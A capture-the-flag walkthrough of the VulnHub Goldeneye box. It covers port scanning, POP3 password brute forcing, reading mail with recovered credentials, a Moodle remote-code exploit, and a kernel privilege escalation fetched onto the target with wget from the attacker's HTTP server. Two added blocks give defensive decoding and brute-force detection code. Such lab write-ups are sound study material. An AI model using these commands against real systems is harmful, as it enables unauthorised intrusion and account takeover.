VulnHub Goldeneye Walkthrough

In this walkthrough, we’ll be looking at Goldeneye from VulnHub. This one was a lot of fun simply because of the flavor. It felt a lot like the OSCP labs as well. So let’s get started!

A typical Nmap scan reveals a few ports – 80 and 25.


nmap -sC -sV -v 192.168.109.133

We’ll check out the webpage, but first let’s get another scan going in the background.

nmap -sC -sV -v -p- 192.168.109.133

This will scan all ports, not just the top 1000, while we do other things.

Navigating to the webpage gives us a fun taste of the box theme.


It also gives a directory to browse. Let’s see what’s there.


Well we don’t have any creds to try right now so we’ll come back later. Let’s look at the source of the home page first.


There’s not much here but let’s see what terminal.js is.

Here we have something interesting. It looks like we have two user names and one encoded password.


I’m going to use BurpSuite to decode it. Once BurpSuite is open, navigate to the Decoder tab and paste in the encoded string. Then click on the “Decode as …” drop-down on the right and select HTML. This reveals the password of InvincibleHack3r.
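The decoding step Burp performs here, as an added example that is not part of the original post: a small Python helper that scans a script’s source for runs of HTML entities and decodes them with html.unescape, which is exactly what “Decode as HTML” does. The terminal.js snippet below is constructed; only the decoded value InvincibleHack3r comes from the walkthrough.

```python
import html
import re
from typing import List, Tuple

# A run of four or more consecutive HTML entities (decimal, hex or named). Splitting a
# string into entities hides it from a casual read of the source but not from a decoder.
ENTITY_RUN = re.compile(r"(?:&#x[0-9a-fA-F]+;|&#[0-9]+;|&[a-zA-Z][a-zA-Z0-9]*;){4,}")

def find_encoded_strings(source: str) -> List[Tuple[str, str]]:
    """Return (encoded, decoded) pairs for every entity run in a JS/HTML source."""
    return [(m.group(0), html.unescape(m.group(0))) for m in ENTITY_RUN.finditer(source)]

# Constructed stand-in for terminal.js (not the real file's contents); the entity run is
# the decimal-entity encoding of the password the walkthrough recovers with Burp.
SAMPLE_JS = """
// constructed sample
var lines = [
  "login with your default password: &#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;",
  "ask boris or natalya if you have questions"
];
"""

if __name__ == "__main__":
    for encoded, decoded in find_encoded_strings(SAMPLE_JS):
        print(f"{encoded[:30]}... -> {decoded}")
```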


Now let’s try that login again.


It works and we get some more fun stuff and some hints. It’s a good thing we have our scanner going.

Before we leave let’s check the source of this page. Not much is here but at the bottom we do find out that Boris and Natalya are supervisors.


Now let’s go back to our nmap scan and see if it found the pop3 ports.


It looks like it did. Unfortunately, the password for Boris doesn’t work.

At this point, we have a few things we can do, and since they might take a little time, let’s get them going at the same time.

First, we’ll get a pop3 brute force going. This is actually where I first ran into trouble. It’s very important to pick a good wordlist here. A lot of times I’ll just use the rockyou wordlist and go do something else while it churns away. In this case, that’s not an option. Hydra will crash after a couple of minutes, but it will give a suggestion to use a shorter wordlist (this is critical). Medusa won’t crash, but it will throw errors and recover, so I went with Medusa instead. The problem is still finding a short enough password list. I ended up using the top-10,000 password list from SecLists, but even that was too big, and I missed out on getting the password for Boris. His password wasn’t critical though. The password list that ultimately works best in this case is called fasttrack.txt. It’s native to Kali, unlike SecLists, which is cloned from GitHub.

OK, so now we have a wordlist, but we need to pick our users. We could do all of them since the list is so short, but the webpage said Boris and Natalya were the administrators to send email to. The nice thing is that we can check their names first. Remember the SMTP server on port 25. Let’s see who’s valid.

Using netcat (nc -nv 192.168.109.133 25) we can connect to the SMTP server. Using vrfy USERNAME we can check the response from the server. Boris and Natalya come back as valid, but the others do not. There’s no sense wasting time brute forcing users that don’t exist, so let’s just create a text file with their names only.


Now we can use hydra or medusa to run through the password list.

hydra -L users -P /usr/share/wordlists/fasttrack.txt pop3://192.168.109.133:55007

or

medusa -U users -P /usr/share/wordlists/fasttrack.txt -h 192.168.109.133 -n 55007 -M pop3 -t 16

With hydra, you’ll want to keep the user names separate because it will crash. At least it did for me, and it won’t recover. Doing one at a time, it won’t run into issues before it finds the passwords.


Medusa will also have issues, but it will recover and continue, and you can do both names together.


Either way, after a couple of minutes you’ll have passwords for both Boris and Natalya. For all Natalya’s trash talking, her password is actually worse than Boris’s.
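The defender’s view of this step, as an added example that is not part of the original post: detection logic for a POP3 password-guessing burst like the one Hydra or Medusa generate, run over constructed Dovecot-style pop3-login log lines (the exact field layout is assumed). It flags a source IP once it crosses a failure threshold inside a time window and, more importantly, flags a successful login from that IP afterwards, which is the moment a guessed password is actually used.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Dovecot-style pop3-login lines (layout assumed, see lead-in): one "Disconnected (auth failed ...)"
# line per failed attempt and one "Login:" line per success, each carrying the remote IP as rip=.
LINE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ dovecot: pop3-login: "
    r"(?P<event>Disconnected \(auth failed[^)]*\)|Login): user=<(?P<user>[^>]*)>.*?rip=(?P<rip>[\d.]+)"
)

def parse(line):
    m = LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime("2024 " + m["ts"], "%Y %b %d %H:%M:%S")  # syslog lines carry no year
    return {"ts": ts, "failed": m["event"] != "Login", "user": m["user"], "rip": m["rip"]}

def detect(lines, threshold=10, window=60):
    """Alert when one source IP accumulates `threshold` failures within `window` seconds,
    and again when a login from an already-flagged IP succeeds (credential now in use)."""
    recent, flagged, alerts = defaultdict(deque), set(), []
    for ev in filter(None, map(parse, lines)):
        q = recent[ev["rip"]]
        if ev["failed"]:
            q.append(ev["ts"])
            while (ev["ts"] - q[0]).total_seconds() > window:   # drop failures outside the window
                q.popleft()
            if len(q) >= threshold and ev["rip"] not in flagged:
                flagged.add(ev["rip"])
                alerts.append(f"BRUTE_FORCE rip={ev['rip']} failures={len(q)} within {window}s")
        elif ev["rip"] in flagged:
            alerts.append(f"SUCCESS_AFTER_BRUTE_FORCE rip={ev['rip']} user={ev['user']}")
    return alerts

def _line(sec, event, user, rip):
    """Build one constructed log line; 192.168.109.128/.133 are the attacker/target from the post."""
    return (f"Jan 12 10:15:{sec:02d} goldeneye dovecot: pop3-login: {event}: "
            f"user=<{user}>, method=PLAIN, rip={rip}, lip=192.168.109.133")

FAIL = "Disconnected (auth failed, 1 attempts in 1 secs)"
SAMPLE_LOG = (
    [_line(s, FAIL, "boris", "192.168.109.128") for s in range(0, 24, 2)]   # 12 guesses in 22 s
    + [_line(5, FAIL, "natalya", "10.0.0.7"),                               # a lone typo, no alert
       _line(26, "Login", "boris", "192.168.109.128")]                      # the guess that worked
)

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Rate limiting or fail2ban-style blocking at the threshold would have stopped the fasttrack.txt run above long before it reached secret1!.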


Anyway, we’ll just let the brute force run while we do this other stuff.

Next we can start gobuster on the website to see if there are any other hidden directories. (It won’t find anything.)

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 192.168.109.133

Finally, we’ll start a nikto scan on the website while we guess passwords.

nikto -h 192.168.109.133

This finds a fun page called /splashAdmin.php which gives us some more potential user names and a really good hint we’ll need later.

Users – Xenia and Janus

Hint – GCC is replaced with the FreeBSD alternative (A quick google search shows this as cc.)


By now our password brute force should be finished and we can put those credentials to good use.

Let’s log into the pop3 server and check out some emails.

nc -nv 192.168.109.133 55007
user boris
pass secret1!
list
retr 1
retr 2
retr 3


There’s some fun theme stuff here, but nothing important. Let’s do the same with Natalya’s account.


Now we’re getting somewhere. We have a new page to check and some account creds. You will have to edit the /etc/hosts file first as the email suggests. Then navigate to the site.


At the bottom of the page you can find that it’s running Moodle. Once logged in, it looks like there’s a message from Dr. Doak. Clicking on the contact information shows that his email username is doak.


Let’s see how secure his password is.

hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.109.133:55007


These secret agents really need to pick better passwords. Well let’s see what’s in his email.


OK, now we have some admin creds. Let’s log back into the website with these and see what we can find. Inside a page called My private files is a secret.txt file. Let’s see what’s in it.


Let’s view the file.


Hmmm … that doesn’t seem too special. Maybe there’s more to it. Let’s download it and see what else we can find.

We can run either file or exiftool on it. Either way, a base64 encoded string can be found in the image description.


Decoding this reveals a password for the admin account.

echo eFdpbnRlcjE5OTV4IQ== | base64 -d


Let’s log in one more time as the admin.


Now we can easily identify the Moodle version.


A quick Google search reveals that this version is exploitable and there’s a Metasploit module for it. You could also just search for it in Metasploit.


There is one important thing to point out with this module: the target ID must be set manually. I know it says 0 is automatic, but it doesn’t work right and will fail. So explicitly set the target to 0 before you run the exploit.


There’s one more thing you’ll have to do to get this to work. The spell check engine must be set to PSpellShell. If you look at the exploit code, it looks like this should be set during exploitation, but it’s not, and you have to set it manually.


Once this is set run the exploit and you should get a shell.


Now I’ll upgrade my shell using Python. It’s not really necessary for this box, but it’s still nicer to work with.

python -c 'import pty; pty.spawn("/bin/bash")'

There are a couple of scripts I usually download and run at this point, but it turns out they are not super helpful here. The exploits are in their output but buried. It was much easier to find the right one by enumerating the kernel manually.

uname -a
cat /etc/lsb-release


The first search that pops up looks like it fits.

It’s C code, so let’s use GCC and compile it on our box.

gcc 37292.c

It gives some warnings, but it looks like it compiled. Let’s see if it works.


I started a Python HTTP server and used wget to transfer the file.

Attacker box: python -m SimpleHTTPServer 80
Victim box: wget 192.168.109.128/a.out
chmod +x a.out
./a.out


When we run it, it doesn’t work. One of the error messages is “gcc: not found”.

That’s odd right? Let’s look at the code and search for gcc.


So the exploit compiles something else when it runs. Remember the hint about gcc being removed: the compiler on this box is cc. Let’s change the compiler in the code to cc and see if it works.

Just FYI: the script may freeze the shell. If it does, you’ll have to manually clean up the files and directories left by the exploit before trying the new version.

Once the new version using cc is run, a root shell spawns.


The root flag is hidden. Use ls -lah to find it.


The final reward is in a web directory you might have found earlier, but if not, take a look at the ending scene.


Well, that was Goldeneye. The wordlist thing was a little frustrating, but the theme of the box was really fun. Anyway, I hope you enjoyed the walkthrough. If you’d like to see a video walkthrough you can find it here. In the video, I also show how to get a shell without using Metasploit.

Happy Hacking!

-R3a50n
